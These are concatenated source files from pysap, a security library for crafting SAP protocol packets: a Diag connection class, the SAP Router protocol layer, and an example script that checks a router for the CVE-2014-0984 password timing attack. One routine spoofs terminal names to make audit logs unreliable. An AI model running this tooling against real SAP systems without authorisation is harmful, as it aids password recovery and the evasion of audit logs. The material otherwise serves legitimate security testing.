    """ @ivar: stores the last response received from the server
        @type: L{SAPNI<SAPNI.SAPNI>} """

    initialized = False
    """ @ivar: if the connection was initialized
        @type: C{bool} """

    step = 0
    """ @ivar: number of the last dialog step performed
        @type: C{int} """

    def __init__(self, host, port, terminal=None, compress=False,
                 init=False, route=None, support_data=default_support_data):
        """Creates the connection to the Diag server.

        @param host: remote host to connect to
        @type host: C{string}

        @param port: remote port to connect to
        @type port: C{int}

        @param terminal: terminal name to use when connecting to the server.
            If no terminal name is specified, a random IP address will be
            generated and used instead of the terminal name.
        @type terminal: C{string}

        @param compress: if true, the compression will be enabled for the
            connection. Otherwise, the connection will be established using
            compression.
        @type compress: C{bool}

        @param init: if true, the initialization will be performed after the
            connection is established.
        @type init: C{bool}

        @param route: route to use for connecting through a SAP Router
        @type route: C{string}

        @param support_data: support data bits to use when initializing. It
            identifies the client's capabilities.
        @type support_data: L{SAPDiagItem} or L{SAPDiagSupportBits} or C{string}
        """

        self.host = host
        self.port = port
        self.terminal = terminal or self.get_terminal_name()
        self.route = route
        self.support_data = self.get_support_data_item(support_data) or default_support_data
        if compress is True:
            self.compress = 1
        else:
            self.compress = 0
        self._connection = None
        if init:
            self.init()

    def connect(self):
        """Creates a L{SAPNIStreamSocket} connection to the host/port. If a route
        was specified, connect to the target Diag server through the SAP Router.
        """
        self._connection = SAPRoutedStreamSocket.get_nisocket(self.host,
                                                              self.port,
                                                              self.route,
                                                              base_cls=SAPDiag)

    def get_terminal_name(self):
        """Generates a random IP address to use as a terminal name. In SAP
        systems that don't implement SAP Note 1497445, the dispatcher registers
        logs the terminal name as provided by the client, or fallbacks to
        registering the IP address if the terminal name can't be resolved.
        Using a random IP address as terminal name in unpatched systems will
        make the 'terminal' field of the security audit log unreliable.
        """
        return '.'.join('%s' % randint(0, 255) for __ in range(4))

    def get_support_data_item(self, support_data):
        if isinstance(support_data, str):
            support_data = SAPDiagSupportBits(unhex(support_data))

        if isinstance(support_data, SAPDiagSupportBits):
            support_data = SAPDiagItem(item_type="APPL",
                                       item_id="ST_USER",
                                       item_sid="SUPPORTDATA",
                                       item_value=support_data)

        if isinstance(support_data, SAPDiagItem):
            return support_data

        return None

    def init(self):
        """Sends an initialization request. If the socket wasn't created,
        call the L{connect} method. If compression was specified, the
        initialization will be performed using the respective User
        Connect item.

        @return: initialization response (usually login screen)
        @rtype: L{SAPNI<SAPNI.SAPNI>}
        """
        if self._connection is None:
            self.connect()

        # If the connection is compressed, use the respective User Connect item
        if self.compress == 1:
            user_connect = user_connect_compressed
        else:
            user_connect = user_connect_uncompressed

        # The initialization is always performed uncompressed
        self.initialized = True  # XXX: Check that the respose was ok

        return self.sr(SAPDiagDP(terminal=self.terminal) /
                       SAPDiag(compress=0, com_flag_TERM_INI=1) /
                       user_connect / self.support_data)

    def send(self, packet):
        """Sends a packet using the L{SAPNIStreamSocket}

        @param packet: packet to send
        @type packet: L{SAPDiag<SAPDiag.SAPDiag>}

        """
        if self._connection is not None:
            self._connection.send(packet)

    def receive(self):
        """Receive a L{SAPNI<SAPNI.SAPNI>} packet using the L{SAPNIStreamSocket}. Response is
        returned and also stored in L{last_response}.

        @return: packet received
        @rtype: L{SAPNI<SAPNI.SAPNI>}
        """
        if self._connection is not None:
            self.last_response = self._connection.recv()
            return self.last_response
        else:
            return None

    def sr(self, packet):
        """Sends and receive a L{SAPNI<SAPNI.SAPNI>} packet using the L{SAPNIStreamSocket}

        @param packet: packet to send
        @type packet: L{SAPDiag<SAPDiag.SAPDiag>}

        @return: packet received
        @rtype: L{SAPNI<SAPNI.SAPNI>}
        """
        if self._connection is not None:
            self.send(packet)
            self.last_response = self.receive()
            return self.last_response
        else:
            return None

    def close(self):
        """Send an 'end of connection' packet and closes the socket

        """
        try:
            self.send(SAPDiag(compress=0, com_flag_TERM_EOC=1))
            self._connection.close()
        except SocketError:  # We don't care about socket errors at this time
            pass

    def sr_message(self, msg):
        """Sends and receive a L{SAPDiag<SAPDiag.SAPDiag>} message, prepending the
        Diag header.

        @param msg: items to send
        @type msg: C{list} of L{SAPDiagItem}

        @return: server's response
        @rtype: L{SAPNI<SAPNI.SAPNI>}

        """
        return self.sr(SAPDiag(compress=self.compress, message=msg))

    def send_message(self, msg):
        """Sends a L{SAPDiag<SAPDiag.SAPDiag>} message, prepending the Diag header.

        @param msg: items to send
        @type msg: C{list} of L{SAPDiagItem}

        """
        self.send(SAPDiag(compress=self.compress, message=msg))

    def interact(self, message):
        """Interacts with the SAP Diag server, adding the L{SAPDiagStep} item and
        ending with a 'end of message' item.

        @param message: items to send
        @type message: C{list} of L{SAPDiagItem}

        @return: server's response
        @rtype: L{SAPNI<SAPNI.SAPNI>}
        """
        if self.initialized:
            self.step = self.step + 1
            message.insert(0, SAPDiagItem(item_type="APPL", item_id="ST_USER",
                                          item_sid=0x26,
                                          item_value=SAPDiagStep(step=self.step)))
            message.append(SAPDiagItem(item_type="EOM"))
            return self.sr_message(message)
        else:
            return None



# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import re
import logging
# External imports
from scapy.layers.inet import TCP
from scapy.packet import Packet, bind_layers
from scapy.supersocket import socket, StreamSocket
from scapy.fields import (ByteField, ShortField, ConditionalField, StrField,
                          IntField, StrNullField, PacketListField,
                          FieldLenField, FieldListField, SignedIntEnumField,
                          StrFixedLenField, PacketField, BitField, LongField)
# Custom imports
from pysap.SAPSNC import SAPSNCFrame
from pysap.SAPNI import SAPNI, SAPNIStreamSocket
from pysap.utils import PacketNoPadded, ByteEnumKeysField, StrNullFixedLenField


# Create a logger for the SAPRouter layer
log_saprouter = logging.getLogger("pysap.saprouter")


# Router Opcode values
router_control_opcodes = {
    0: "Error information",
    1: "Version request",
    2: "Version response",
    5: "Send Handle (5)",            # TODO: Check this opcodes
    6: "Send Handle (6)",            # TODO: Check this opcodes
    8: "Send Handle (8)",            # TODO: Check this opcodes
    70: "SNC request",
    71: "SNC handshake complete",
}
"""Router Opcode values"""


# Router Return Code values (as per SAP Note 63342 http://service.sap.com/sap/support/notes/63342)
router_return_codes = {
    -1: "NI-internal error (NIEINTERN)",
    -2: "Host name unknown (NIEHOST_UNKNOWN)",
    -3: "Service unknown (NIESERV_UNKNOWN)",
    -4: "Service already used (NIESERV_USED)",
    -5: "Time limit reached (NIETIMEOUT)",
    -6: "Connection to partner broken (NIECONN_BROKEN)",
    -7: "Data range too small (NIETOO_SMALL)",
    -8: "Invalid parameters (NIEINVAL)",
    -9: "Wake-Up (without data) (NIEWAKEUP)",
    -10: "Connection setup failed (NIECONN_REFUSED)",
    -11: "PING/PONG signal received (NIEPING)",
    -12: "Connection to partner via NiRouter not yet set up (NIECONN_PENDING)",
    -13: "Invalid version (NIEVERSION)",
    -14: "Local hostname cannot be found (NIEMYHOSTNAME)",
    -15: "No free port in range (NIENOFREEPORT)",
    -16: "Local hostname invalid (NIEMYHOST_VERIFY)",
    -17: "Error in the SNC shift in the saprouter ==> (NIESNC_FAILURE)",
    -18: "Opcode received (NIEOPCODE)",
    -19: "queue limit reached, next package not accepted (NIEQUE_FULL)",
    -20: "Requested package too large (NIETOO_BIG)",
    -90: "Host name unknown (NIEROUT_HOST_UNKNOWN)",
    -91: "Service unknown (NIEROUT_SERV_UNKNOWN)",
    -92: "Connection setup failed (NIEROUT_CONN_REFUSED)",
    -93: "NI-internal errors (NIEROUT_INTERN)",
    -94: "Connect from source to destination not allowed (NIEROUT_PERM_DENIED)",
    -95: "Connection terminated (NIEROUT_CONN_BROKEN)",
    -96: "Invalid client version (NIEROUT_VERSION)",
    -97: "Connection cancelled by administrator (NIEROUT_CANCELED)",
    -98: "saprouter shutdown (NIEROUT_SHUTDOWN)",
    -99: "Information request refused (NIEROUT_INFO_DENIED)",
    -100: "Max. number of clients reached (NIEROUT_OVERFLOW)",
    -101: "Talkmode not allowed (NIEROUT_MODE_DENIED)",
    -102: "Client not available (NIEROUT_NOCLIENT)",
    -103: "Error in external library (NIEROUT_EXTERN)",
    -104: "Error in the SNC shift (NIEROUT_SNC_FAILURE)",
}
"""Router Return Code values"""


# Router Administration Command values
router_adm_commands = {
    2: "Information Request",
    3: "New Route Table Request",
    4: "Toggle Trace Request",
    5: "Stop Request",
    6: "Cancel Route Request",
    7: "Dump Buffers Request",
    8: "Flush Buffers Request",
    9: "Soft Shutdown Request",
    10: "Set Trace Peer",
    11: "Clear Trace Peer",
    12: "Trace Connection",
    13: "Trace Connection",
    14: "Hide Error Information Request",
}
"""Router Administration Command values"""


# Router NI Talk mode values
router_ni_talk_mode_values = {
    0: "NI_MSG_IO",
    1: "NI_RAW_IO",
    2: "NI_ROUT_IO",
}
"""Router NI Talk mode values"""


class SAPRouterRouteHop(PacketNoPadded):
    """SAP Router Protocol Route Hop

    This packet is used to describe a hop in a route using the SAP Router.
    """
    name = "SAP Router Route Hop"
    fields_desc = [
        StrNullField("hostname", None),
        StrNullField("port", None),
        StrNullField("password", None),
    ]

    regex = re.compile(r"""
        (/H/(?P<hostname>[\w\.]+)              # Hostname, FQDN or IP addresss
        (/S/(?P<port>[\w]+))?                  # Optional port/service
        (/[PW]/(?P<password>[\w.]+))?          # Optional password
        )
    """, re.VERBOSE)
    """ @cvar: Regular expression for matching route strings
        @type: regex
    """

    @classmethod
    def from_string(cls, route_string):
        """Build a list of route hops from a route string. The format of a
        route string is:

        (/H/host/S/service/W/pass)*

        or for older versions (<4.0):

        (/H/host/S/service/P/pass)*

        @param route_string: route string
        @type route_string: C{string}

        @return: route hops in the route string
        @rtype: C{list} of L{SAPRouterRouteHop}
        """
        result = []
        for route_hop in [x.groupdict() for x in cls.regex.finditer(route_string)]:
            result.append(cls(hostname=route_hop["hostname"],
                              port=route_hop["port"],
                              password=route_hop["password"]))
        return result

    @classmethod
    def from_hops(cls, route_hops):
        """Build a route string from a list of route hops.

        @param route_hops: route hops
        @type route_hops: C{list} of L{SAPRouterRouteHop}

        @return: route string
        @rtype: C{string}
        """
        result = ""
        for route_hop in route_hops:
            result += "/H/%s" % route_hop.hostname
            if route_hop.port:
                result += "/S/%s" % route_hop.port
            if route_hop.password:
                result += "/W/%s" % route_hop.password
        return result


class SAPRouterInfoClient(PacketNoPadded):
    """SAP Router Protocol Information Request Client info

    This packet is used to return the information of a connected client.
    """
    name = "SAP Router Client Info"
    fields_desc = [  # 137 bytes length
        IntField("id", 1),
        BitField("flag_XXX1", 0, 1),
        BitField("flag_XXX2", 0, 1),
        BitField("flag_XXX3", 0, 1),
        BitField("flag_XXX4", 0, 1),
        BitField("flag_XXX5", 0, 1),
        BitField("flag_traced", 0, 1),
        BitField("flag_connected", 0, 1),
        BitField("flag_routed", 0, 1),
        LongField("connected_on", 0),
        StrNullFixedLenField("address", None, length=45),
        StrNullFixedLenField("partner", None, length=45),
        StrNullFixedLenField("service", None, length=27),
        StrFixedLenField("XXX3", None, length=4),
    ]


class SAPRouterInfoClients(PacketNoPadded):
    """SAP Router Protocol Information Request Client info list

    This packet is used to return the list of current connected clients.
    """
    name = "SAP Router Client Info List"
    fields_desc = [
        PacketListField("clients", None, SAPRouterInfoClient)
    ]


class SAPRouterInfoServer(PacketNoPadded):
    """SAP Router Protocol Information Request Server info

    This packet is used to return information about the SAP Router
    """
    name = "SAP Router Server Info"
    fields_desc = [
        IntField("pid", 0),
        IntField("ppid", 0),
        LongField("started_on", 0),
        ShortField("port", 0),
        ShortField("pport", 0),
    ]


class SAPRouterError(PacketNoPadded):
    """SAP Router Protocol Error Text

    This packet is used to describe an error returned by SAP Router.
    """
    name = "SAP Router Error Text"
    fields_desc = [
        StrNullField("eyecatcher", "*ERR*"),
        StrNullField("counter", "1"),
        StrNullField("error", ""),
        StrNullField("return_code", ""),
        StrNullField("component", "NI (network interface)"),
        StrNullField("release", ""),
        StrNullField("version", ""),
        StrNullField("module", "nirout.cpp"),
        StrNullField("line", ""),
        StrNullField("detail", ""),
        StrNullField("error_time", ""),
        StrNullField("system_call", ""),
        StrNullField("errorno", ""),
        StrNullField("errorno_text", ""),
        StrNullField("error_count", ""),
        StrNullField("location", ""),
        StrNullField("XXX5", ""),
        StrNullField("XXX6", ""),
        StrNullField("XXX7", ""),
        StrNullField("XXX8", ""),
        StrNullField("eyecatcher", "*ERR*"),
    ]

    time_format = "%a %b %d %H:%M:%S %Y"
    """ @cvar: Format to use when building the time field
        @type: C{string}
    """


def router_is_route(pkt):
    """Returns if the packet is a Route packet.

    @param pkt: packet to look at
    @type pkt: L{SAPRouter}

    @return: if the type of the packet is Route
    @rtype: C{bool}
    """
    return pkt.type == SAPRouter.SAPROUTER_ROUTE


def router_is_admin(pkt):
    """Returns if the packet is a Admin packet.

    @param pkt: packet to look at
    @type pkt: L{SAPRouter}

    @return: if the type of the packet is Admin
    @rtype: C{bool}
    """
    return pkt.type == SAPRouter.SAPROUTER_ADMIN


def router_is_error(pkt):
    """Returns if the packet is a Error Information packet.

    @param pkt: packet to look at
    @type pkt: L{SAPRouter}

    @return: if the type of the packet is Error
    @rtype: C{bool}
    """
    return pkt.type == SAPRouter.SAPROUTER_ERROR


def router_is_control(pkt):
    """Returns if the packet is a Control packet.

    @param pkt: packet to look at
    @type pkt: L{SAPRouter}

    @return: if the type of the packet is Control
    @rtype: C{bool}
    """
    return pkt.type == SAPRouter.SAPROUTER_CONTROL


def router_is_pong(pkt):
    """Returns if the packet is a Pong (route accepted) packet.

    @param pkt: packet to look at
    @type pkt: L{SAPRouter}

    @return: if the type of the packet is Pong
    @rtype: C{bool}
    """
    return pkt.type == SAPRouter.SAPROUTER_PONG


def router_is_known_type(pkt):
    """Returns if the packet is of a known type (Admin, Route, Error or Pong).

    @param pkt: packet to look at
    @type pkt: L{SAPRouter}

    @return: if the type of the packet is known
    @rtype: C{bool}

    """
    return pkt.type in SAPRouter.router_type_values


class SAPRouter(Packet):
    """SAP Router packet

    This packet is used for general SAP Router packets. There are (at least)
    five types of SAP Router packets:

        1. Route packets. For requesting the routing of a connection to a
        remote hosts. The packet contains some general information and a
        connection string with a list of routing hops (L{SAPRouterRouteHop}).

        2. Administration packets. This packet is used for the SAP Router to
        send administrative commands. It's suppose to be used only from the
        hosts running the SAP Router or when an specific route is included in
        the routing table. Generally administration packets are not accepted
        from the external binding.

        3. Error Information packets. Packets sent when an error occurred.

        4. Control Message packets. Used to perform some control activities,
        like retrieving the current SAPRouter version or to perform the SNC
        handshake. They have the same structure that error information
        packets.

        5. Route accepted packet. Used to acknowledge a route request
        ("NI_PONG").


    Routed packets and some responses doesn't fill in these five packet
    types. For identifying those cases, you should check the type using the
    function L{router_is_known_type}.

    NI Versions found (unconfirmed):
        - 36: Release <6.20
        - 38: Release 7.00/7.10
        - 40: Release 7.20/7.21
    """

    # Constants for router types
    SAPROUTER_ROUTE = "NI_ROUTE"
    """ @cvar: Constant for route packets
        @type: C{string} """

    SAPROUTER_ADMIN = "ROUTER_ADM"
    """ @cvar: Constant for administration packets
        @type: C{string} """

    SAPROUTER_ERROR = "NI_RTERR"
    """ @cvar: Constant for error information packets
        @type: C{string} """

    SAPROUTER_CONTROL = "NI_RTERR"
    """ @cvar: Constant for control messages packets
        @type: C{string} """

    SAPROUTER_PONG = "NI_PONG"
    """ @cvar: Constant for route accepted packets
        @type: C{string} """

    router_type_values = [
        SAPROUTER_ADMIN,
        SAPROUTER_ERROR,
        SAPROUTER_CONTROL,
        SAPROUTER_ROUTE,
        SAPROUTER_PONG,
    ]
    """ @cvar: List of known packet types
        @type: C{list} of C{string} """

    name = "SAP Router"
    fields_desc = [
        # General fields present in all SAP Router packets
        StrNullField("type", SAPROUTER_ROUTE),

        ConditionalField(ByteField("version", 0x02), lambda pkt:router_is_known_type(pkt) and not router_is_pong(pkt)),

        # Route packets
        ConditionalField(ByteField("route_ni_version", 0x28), router_is_route),
        ConditionalField(ByteField("route_entries", 0), router_is_route),
        ConditionalField(ByteEnumKeysField("route_talk_mode", 0, router_ni_talk_mode_values), router_is_route),
        ConditionalField(ShortField("route_padd", 0), router_is_route),
        ConditionalField(ByteField("route_rest_nodes", 0), router_is_route),
        ConditionalField(FieldLenField("route_length", 0, length_of="route_string", fmt="I"), router_is_route),
        ConditionalField(IntField("route_offset", 0), router_is_route),
        ConditionalField(PacketListField("route_string", None, SAPRouterRouteHop,
                                         length_from=lambda pkt:pkt.route_length), router_is_route),

        # Admin packets
        ConditionalField(ByteEnumKeysField("adm_command", 0x02, router_adm_commands), router_is_admin),
        ConditionalField(ShortField("adm_unused", 0x00), lambda pkt:router_is_admin(pkt) and pkt.adm_command not in [10, 11, 12, 13]),

        # Info Request fields
        ConditionalField(StrNullFixedLenField("adm_password", "", 19), lambda pkt:router_is_admin(pkt) and pkt.adm_command in [2]),

        # Cancel Route fields
        ConditionalField(FieldLenField("adm_client_count", None, count_of="adm_client_ids", fmt="H"), lambda pkt:router_is_admin(pkt) and pkt.adm_command in [6]),
        ConditionalField(FieldListField("adm_client_ids", [0x00], IntField("", 0), count_from=lambda pkt:pkt.adm_client_count), lambda pkt:router_is_admin(pkt) and pkt.adm_command in [6]),

        # Trace Connection fields
        ConditionalField(FieldLenField("adm_client_count", None, count_of="adm_client_ids", fmt="I"), lambda pkt:router_is_admin(pkt) and pkt.adm_command in [12, 13]),
        ConditionalField(FieldListField("adm_client_ids", [0x00], IntField("", 0), count_from=lambda pkt:pkt.adm_client_count), lambda pkt:router_is_admin(pkt) and pkt.adm_command in [12, 13]),

        # Set/Clear Peer Trace fields  # TODO: Check whether this field should be a IPv6 address or another proper field
        ConditionalField(StrFixedLenField("adm_address_mask", "", 32), lambda pkt:router_is_admin(pkt) and pkt.adm_command in [10, 11]),

        # Error Information/Control Messages fields
        ConditionalField(ByteEnumKeysField("opcode", 0, router_control_opcodes), lambda pkt: router_is_error(pkt) or router_is_control(pkt)),
        ConditionalField(ByteField("opcode_padd", 0), lambda pkt: router_is_error(pkt) or router_is_control(pkt)),
        ConditionalField(SignedIntEnumField("return_code", 0, router_return_codes), lambda pkt: router_is_error(pkt) or router_is_control(pkt)),

        # Error Information fields
        ConditionalField(FieldLenField("err_text_length", None, length_of="err_text_value", fmt="!I"), lambda pkt: router_is_error(pkt) and pkt.opcode == 0),
        ConditionalField(PacketField("err_text_value", SAPRouterError(), SAPRouterError), lambda pkt: router_is_error(pkt) and pkt.opcode == 0),
        ConditionalField(IntField("err_text_unknown", 0), lambda pkt: router_is_error(pkt) and pkt.opcode == 0),

        # Control Message fields
        ConditionalField(IntField("control_text_length", 0), lambda pkt: router_is_control(pkt) and pkt.opcode != 0),
        ConditionalField(StrField("control_text_value", "*ERR"), lambda pkt: router_is_control(pkt) and pkt.opcode != 0),

        # SNC Frame fields
        ConditionalField(PacketField("snc_frame", None, SAPSNCFrame), lambda pkt: router_is_control(pkt) and pkt.opcode in [70, 71])
    ]


# Retrieve the version of the remote SAP Router
def get_router_version(connection):
    """Helper function to retrieve the version of a remote SAP Router. It
    uses a control packet with the 'version request' operation code.

    @param connection: connection with the SAP Router
    @type connection: L{SAPNIStreamSocket}

    @return: version or None
    """
    response = connection.sr(SAPRouter(type=SAPRouter.SAPROUTER_CONTROL,
                                       version=40,
                                       opcode=1))
    response.decode_payload_as(SAPRouter)
    if router_is_control(response) and response.opcode == 2:
        return response.version
    else:
        return None


class SAPRouteException(Exception):
    """Exception for SAP Router routing errors"""


class SAPRoutedStreamSocket(SAPNIStreamSocket):
    """Stream socket implementation for a connection routed through a SAP
    Router server. It works by wrapping a L{SAPNIStreamSocket} and connecting
    first to the SAP Router given a route string or list of L{SAPRouterRouteHop}.
    """

    desc = "NI Stream socket routed trough a SAP Router"

    def __init__(self, sock, route, talk_mode=None, router_version=None,
                 keep_alive=True, base_cls=None):
        """Initialize the routed stream socket. It should receive a socket
        connected with the SAP Router, and a route to specify to it. After
        initialization and if the route is accepted all calls to send() and
        recv() would be made to the target host/service trough the SAP
        Router.

        @param sock: a socket connected to the SAP Router
        @type sock: C{socket}

        @param route: a route to specify to the SAP Router
        @type route: C{list} of L{SAPRouterRouteHop}

        @param talk_mode: the talk mode to use when routing
        @type talk_mode: C{int}

        @param router_version: the router version to use for requesting the
            route. If no router version is provided, it will be obtained from
            the SAP Router by means of a control packet.
        @type router_version: C{int}

        @param keep_alive: if true, the socket will automatically respond to
            keep-alive request messages. Otherwise, the keep-alive messages
            are passed to the caller in L{recv} and L{sr} calls.
        @type keep_alive: C{bool}

        @param base_cls: the base class to use when receiving packets, it uses
            SAPNI as default if no class specified
        @type base_cls: L{Packet} class

        """
        self.routed = False
        self.talk_mode = talk_mode
        self.router_version = router_version
        # Connect to the SAP Router
        SAPNIStreamSocket.__init__(self, sock, keep_alive=keep_alive,
                                   base_cls=base_cls)
        # Now that we've a NIStreamSocket, retrieve the router version if
        # was not specified
        if self.router_version is None:
            self.router_version = get_router_version(self)
        self.route_to(route, talk_mode)

    def route_to(self, route, talk_mode):
        """Make the route request to the target host/service.

        @param route: a route to specify to the SAP Router
        @type route: C{list} of L{SAPRouterRouteHop}

        @param talk_mode: the talk mode to use when routing
        @type talk_mode: C{int}

        @raise SAPRouteException: if the route request to the target host/port
            was not accepted by the SAP Router

        @raise socket.error: if the connection to the target host/port failed
            or the SAP Router returned an error
        """
        # Build the route request packet
        talk_mode = talk_mode or 0
        router_strings = list(map(str, route))
        target = "%s:%d" % (route[-1].hostname, int(route[-1].port))
        router_strings_lens = list(map(len, router_strings))
        route_request = SAPRouter(type=SAPRouter.SAPROUTER_ROUTE,
                                  route_ni_version=self.router_version,
                                  route_entries=len(route),
                                  route_talk_mode=talk_mode,
                                  route_rest_nodes=1,
                                  route_length=sum(router_strings_lens),
                                  route_offset=router_strings_lens[0],
                                  route_string=route)
        log_saprouter.debug("Requesting route to %s using mode %d (%s)",
                            target, talk_mode, router_ni_talk_mode_values[talk_mode])
        # Send the request and grab the response
        response = self.sr(route_request)
        response.decode_payload_as(SAPRouter)
        if SAPRouter in response:
            response = response[SAPRouter]
            if router_is_pong(response):
                self.routed = True
                log_saprouter.debug("Route to %s accepted", target)
            elif router_is_error(response) and response.return_code == -94:
                log_saprouter.debug("Route to %s denied", target)
                raise SAPRouteException("Route request not accepted")
            else:
                log_saprouter.warning("Error requesting route to %s", target)
                raise Exception("Router error:", response.err_text_value)
        else:
            log_saprouter.warning("Error requesting route to %s", target)
            raise Exception("Wrong response received")

    def recv(self):
        """Receive a packet from the target host. If the talk mode in use is
        native and we've already set the route, the packet received is a raw
        packet. Otherwise, the packet received is a NI layer packet in the same
        way the L{SAPNIStreamSocket} works.
        """
        # If we're working on native mode and the route was accepted, we don't
        # need the NI layer anymore. Just use the plain socket inside the
        # NIStreamSockets.
        if self.routed:
            if self.talk_mode == 1:
                return StreamSocket.recv(self)
        # If the route was not accepted yet or we're working on non-native talk
        # mode, we need the NI layer.
        return SAPNIStreamSocket.recv(self)

    @classmethod
    def get_nisocket(cls, host=None, port=None, route=None, password=None,
                     talk_mode=None, router_version=None, **kwargs):
        """Helper function to obtain a L{SAPRoutedStreamSocket}.

        @param host: target host to connect to if not specified in the route
        @type host: C{string}

        @param port: target port to connect to if not specified in the route
        @type port: C{int}

        @param route: route to use for determining the SAP Router to connect
        @type route: C{string} or C{list} of L{SAPRouterRouteHop}

        @param password: target password if not specified in the route
        @type password: C{string}

        @param talk_mode: the talk mode to use for requesting the route
        @type talk_mode: C{int}

        @param router_version: the router version to use for requesting the
            route
        @type router_version: C{int}

        @keyword kwargs: arguments to pass to L{SAPRoutedStreamSocket}
            constructor

        @return: connected socket through the specified route
        @rtype: L{SAPRoutedStreamSocket}

        @raise SAPRouteException: if the route request to the target host/port
            was not accepted by the SAP Router

        @raise socket.error: if the connection to the target host/port failed
            or the SAP Router returned an error
        """
        # If no route was provided, use the standard SAPNIStreamSocket
        # get_nisocket method
        if route is None:
            return SAPNIStreamSocket.get_nisocket(host, port, **kwargs)

        # If the route was provided using a route string, convert it to a
        # list of hops
        if isinstance(route, str):
            route = SAPRouterRouteHop.from_string(route)

        # If the host and port were specified, we need to add a new hop to
        # the route
        if host is not None and port is not None:
            route.append(SAPRouterRouteHop(hostname=host,
                                           port=port,
                                           password=password))

        # Connect to the first hop in the route (it should be the SAP Router)
        sock = socket.create_connection((route[0].hostname, int(route[0].port)))

        # Create a SAPRoutedStreamSocket instance specifying the route
        return cls(sock, route, talk_mode, router_version, **kwargs)


# Bind SAP NI with the SAP Router port
bind_layers(TCP, SAPNI, dport=3299)



#!/usr/bin/env python
# ===========
# pysap - Python library for crafting SAP's network protocols packets
#
# Copyright (C) 2015 by Martin Gallo, Core Security
#
# The library was designed and developed by Martin Gallo from the Security
# Consulting Services team of Core Security.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# ==============

# Standard imports
import logging
from optparse import OptionParser, OptionGroup
# External imports
from scapy.config import conf
from scapy.packet import bind_layers
# Custom imports
import pysap
from pysap.SAPNI import SAPNI, SAPNIStreamSocket
from pysap.SAPRouter import SAPRouter, get_router_version


# Bind the SAPRouter layer
bind_layers(SAPNI, SAPRouter, )

# Set the verbosity to 0
conf.verb = 0


# Command line options parser
def parse_options():

    description = \
    """This example script connects with a SAP Router service and makes an
    information request using a provided password. It then records the
    time the remote service takes to respond to the request. Further analysis
    of the time records could be performed in order to identify whether the
    server is vulnerable to a timing attack on the password check (CVE-2014-0984).
    More details about the vulnerability in http://www.coresecurity.com/advisories/sap-router-password-timing-attack.

    The script make use of the fau_timer library for measuring the timing of
    server's responses. Install the library from https://code.google.com/p/fau-timer/
    and see patch in issue #8 (https://code.google.com/p/fau-timer/issues/detail?id=8).
    """

    epilog = "pysap %(version)s - %(url)s - %(repo)s" % {"version": pysap.__version__,
                                                         "url": pysap.__url__,
                                                         "repo": pysap.__repo__}

    usage = "Usage: %prog [options] -d <remote host>"

    parser = OptionParser(usage=usage, description=description, epilog=epilog)

    target = OptionGroup(parser, "Target")
    target.add_option("-d", "--remote-host", dest="remote_host", help="Remote host [%default]", default="127.0.0.1")
    target.add_option("-p", "--remote-port", dest="remote_port", type="int", help="Remote port [%default]", default=3299)
    target.add_option("--router-version", dest="router_version", type="int", help="SAP Router version to use [retrieve from the remote SAP Router]")
    parser.add_option_group(target)

    misc = OptionGroup(parser, "Misc options")
    misc.add_option("-t", "--tries", dest="tries", default=10, type="int", help="Amount of tries to make for each length [%default]")
    misc.add_option("--password", dest="password", default="password", help="Correct password to test")
    misc.add_option("-o", "--output", dest="output", default="output.csv", help="Output file [%default]")
    misc.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose output [%default]")
    parser.add_option_group(misc)

    (options, _) = parser.parse_args()

    if not options.remote_host:
        parser.error("Remote host is required")

    return options


def try_password(options, password, output=None, k=0):

    p = SAPRouter(type=SAPRouter.SAPROUTER_ADMIN, version=options.router_version)
    p.adm_command = 2
    p.adm_password = password
    p = str(SAPNI() / p)

    import fau_timer
    fau_timer.init()
    fau_timer.send_request(options.remote_host, options.remote_port, p, len(p))
    fau_timer.calculate_time()
    cpuSpeed = fau_timer.get_speed()
    cpuTicks = fau_timer.get_cpu_ticks()
    time = fau_timer.get_time()

    if options.verbose:
        print("Request time: CPU Speed: %s Hz CPU Ticks: %s Time: %s nanosec" % (cpuSpeed, cpuTicks, time))

    # Write the time to the output file
    if output:
        output.write("%i,%s,%s\n" % (k, password, time))

    return time


# Main function
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    # Initiate the connection
    conn = SAPNIStreamSocket.get_nisocket(options.remote_host, options.remote_port)
    print("[*] Connected to the SAP Router %s:%d" % (options.remote_host, options.remote_port))

    # Retrieve the router version used by the server if not specified
    if options.router_version is None:
        options.router_version = get_router_version(conn)

    print("[*] Using SAP Router version %d" % options.router_version)

    print("[*] Checking if the server is vulnerable to a timing attack (CVE-2014-0984) ...")

    with open(options.output, "w") as f:

        c = 0
        for i in range(0, len(options.password) + 1):
            password = options.password[:i] + "X" * (len(options.password) - i)
            print("[*] Trying with password (%s) len %d" % (password, len(password)))
            for _ in range(0, options.tries):
                try_password(options, password, f, c)
                c += 1


if __name__ == "__main__":
    main()
